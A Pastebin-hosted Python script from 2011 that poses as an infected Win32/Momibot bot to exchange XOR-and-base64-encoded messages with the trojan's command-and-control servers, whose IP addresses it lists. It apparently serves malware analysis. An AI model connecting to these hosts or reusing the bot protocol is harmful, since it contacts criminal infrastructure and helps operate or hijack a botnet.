API tools faq
paste
Advertisement
dah4cker

MomiComm.py

dah4cker
Aug 10th, 2011
458
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.17 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. # DaH4cKeR : 09-Aug-2011
  3. # Script : MomiComm.py
  4. # http://hypersecurity.blogspot.com
  5. #
  6. # Script to communicate with Win32/Momibot Trojan. It will send &
  7. # receive commands from the C&C server and display all responses (XML)
  8. # in clear text.
  9. #
  10. # http://www.microsoft.com/security/portal/Entry.aspx?name=Backdoor:Win32/Momibot.gen!B
  11. #
  12. # Cheers,
  13. # @DaH4cker
  14. #
  15. #######################################################################################
  16.  
  17. #CnC="212.124.123.98:80"    #Sample MD5: 108da66dfa28a790a08be1965a2df8c2
  18. #CnC="184.105.178.85:80"    #Sample MD5: 2a593a1ead30ee30017d71bd18d9e66b
  19. CnC="203.146.253.110:8090"  #Sample MD5: 598417359361205d9c2a1892e3a31c13
  20.  
  21. # All the samples I analyzed so far seem to be using the following XOR key
  22. # and PHP pages for communication.
  23.  
  24. cntrl_page="/v4/index.php"
  25. #cntrl_page="/v5/index.php"
  26. XOR_key="\x53"
  27.  
  28. ################### Modify beyond this at your own risk ! #####################
  29.  
  30.  
  31. import base64
  32. import httplib
  33.  
  34. def encrypt(msg, key):
  35.     data = ''
  36.     for char in msg:
  37.         char = chr(ord(char) ^ ord(key))
  38.         data += char
  39.     enc = base64.b64encode(data)
  40.     return enc
  41.  
  42. def decrypt(msg, key):
  43.     try:
  44.         dec = base64.b64decode(msg)
  45.         data = ''
  46.         for char in dec:
  47.             char = chr(ord(char) ^ ord(key))
  48.             data += char
  49.         return data
  50.     except Exception:
  51.         return "Invalid or Unknown Response"
  52.  
  53. def send_receive(params):
  54.     try:
  55.         conn = httplib.HTTPConnection(CnC)
  56.         headers = {"Content-Type": "text/xml"}
  57.         conn.request("POST", cntrl_page, params, headers)
  58.         resp = conn.getresponse()
  59.     except Exception,err:
  60.         return "Timed Out - "+str(err)
  61.     if resp.status == 200:
  62.         data = decrypt(resp.read(),XOR_key)
  63.     else:
  64.         data = str(resp.status)+" "+resp.reason
  65.     conn.close()
  66.     return data
  67.  
  68. if __name__ == "__main__":
  69.     hello_msg = "<root><binfo id=\'3559939039\' nt=\'1\' bv=\'4.6\' lt=\'LAN\' os=\'Windows XP Professional\'> </binfo></root>"
  70.     ping_msg = "<root><ping id=\'3559939039\'/></root>"
  71.  
  72.     test1 = encrypt(hello_msg, XOR_key)
  73.     print "Sending hello packet.."
  74.     print "Response: "+send_receive(test1)
  75.  
  76.     test2 = encrypt(ping_msg, XOR_key)
  77.     print "Sending ping packet.."
  78.     print "Response: "+send_receive(test2)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!